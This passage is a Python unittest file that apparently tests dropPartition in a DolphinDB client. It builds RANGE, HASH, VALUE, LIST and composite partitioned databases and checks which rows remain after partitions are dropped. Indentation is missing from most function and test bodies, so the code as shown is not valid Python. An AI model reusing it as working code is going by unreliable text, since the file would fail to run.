s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',VALUE,1..10)
db=database(dbPath,COMPO,[db1,db2])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`id).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`id).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_list_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',LIST,[`AMD`QWE`CES,`DOP`ASZ,`FSD`BBVC,`AWQ`DS])
db=database(dbPath,COMPO,[db1,db2])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`sym).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`sym).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
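
# Build a three-level COMPO DFS database: RANGE by month, HASH([INT,10]) on id,
# and LIST on sym.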
def create_dfs_compo_range_hash_list_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',HASH,[INT,10])
db3=database('',LIST,[`AMD`QWE`CES,`DOP`ASZ,`FSD`BBVC,`AWQ`DS])
db=database(dbPath,COMPO,[db1,db2,db3])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`id`sym).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`id`sym).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_value_list_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',VALUE,1..10)
db3=database('',LIST,[`AMD`QWE`CES,`DOP`ASZ,`FSD`BBVC,`AWQ`DS])
db=database(dbPath,COMPO,[db1,db2,db3])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`id`sym).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`id`sym).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
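
# Load a DFS table into a pandas DataFrame, optionally filtered by a where clause.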
def loadTB(dbPath, tbName, where=""):
    s = ddb.session()
    s.connect(HOST, PORT, "admin", "123456")
    try:
        # The optional where clause is appended verbatim to the query; an empty
        # string leaves the query unfiltered.
        return s.run("select * from loadTable('{db}', '{tb}') ".format(db=dbPath, tb=tbName) + where)
    finally:
        s.close()
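
# Every test below follows the same pattern: rebuild the database, snapshot the
# full table (origin) and the rows expected to survive the drop (rs), call
# dropPartition against one table (or against the whole database when no table
# is given), then verify the affected table equals rs while the other table
# still equals origin.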
class DropPartitionTest(unittest.TestCase):
    def setUp(self):
        # One fresh session per test; drop any leftover test database first.
        self.s = ddb.session()
        self.s.connect(HOST, PORT, "admin", "123456")
        dbPath = DBInfo.dfsDBName
        script = """
        if(existsDatabase('{dbPath}'))
            dropDatabase('{dbPath}')
        """.format(dbPath=dbPath)
        self.s.run(script)

    def tearDown(self):
        # Drop the test database again and release the session.
        dbPath = DBInfo.dfsDBName
        script = """
        if(existsDatabase('{dbPath}'))
            dropDatabase('{dbPath}')
        """.format(dbPath=dbPath)
        self.s.run(script)
        self.s.close()
def test_dropPartition_dfs_range_drop_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
bound = str(DBInfo.tableRows//10 + 1)
# tb1 dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["'/1_" + bound + "'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/1_" + bound + "'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/1_" + bound + "'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_range_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
        bound = str(DBInfo.tableRows * 4 // 10 + 1)
        # NOTE: these partition paths assume DBInfo.tableRows == 10000; keep them
        # in sync with the database's RANGE boundaries if tableRows changes.
        partitions = ["'/1_1001'", "'/1001_2001'", "'/2001_3001'", "'/3001_4001'"]
# tb1 dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, partitions, tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, partitions, tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, partitions)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
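
    # HASH partitions are addressed by bucket number: with HASH([INT,10]) and
    # ids 1..10, bucket 0 holds id==10 and bucket 1 holds id==1.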
def test_dropPartition_dfs_hash_drop_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id!=10")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ['0'], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id!=10")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['0'], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id!=10")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['0'])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_hash_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id in 2..9")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ['0', '1'], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id in 2..9")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['0', '1'], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id in 2..9")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['0', '1'])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
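
    # VALUE partitions are addressed by the partitioning value itself, here a date.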
def test_dropPartition_dfs_value_drop_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date!=2010.01.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ['2010.01.01'], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date!=2010.01.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['2010.01.01'], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date!=2010.01.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['2010.01.01'])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_value_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(date,2010.01.01+[0,7,14,21])")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ['2010.01.01', '2010.01.08', '2010.01.15', '2010.01.22'], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(date,2010.01.01+[0,7,14,21])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['2010.01.01', '2010.01.08', '2010.01.15', '2010.01.22'], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(date,2010.01.01+[0,7,14,21])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['2010.01.01', '2010.01.08', '2010.01.15', '2010.01.22'])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
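
    # LIST partitions are addressed by their on-disk paths: '/List0' is the first
    # sym group (`AMD`QWE`CES), '/List1' the second, and so on.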
def test_dropPartition_dfs_list_drop_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["'/List0'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/List0'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/List0'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_list_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["'/List1'", "'/List2'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/List1'", "'/List2'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/List1'", "'/List2'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
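
    # COMPO partitions are addressed level by level: the first path element picks
    # the level-1 (month) partition, the second the level-2 partition; passing
    # only the first element drops the entire level-1 branch.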
def test_dropPartition_dfs_compo2_range_range_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_range_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_range_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id>=3")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id>=3")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id>=3")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_range_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_range_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_hash_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_hash_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_hash_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_hash_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
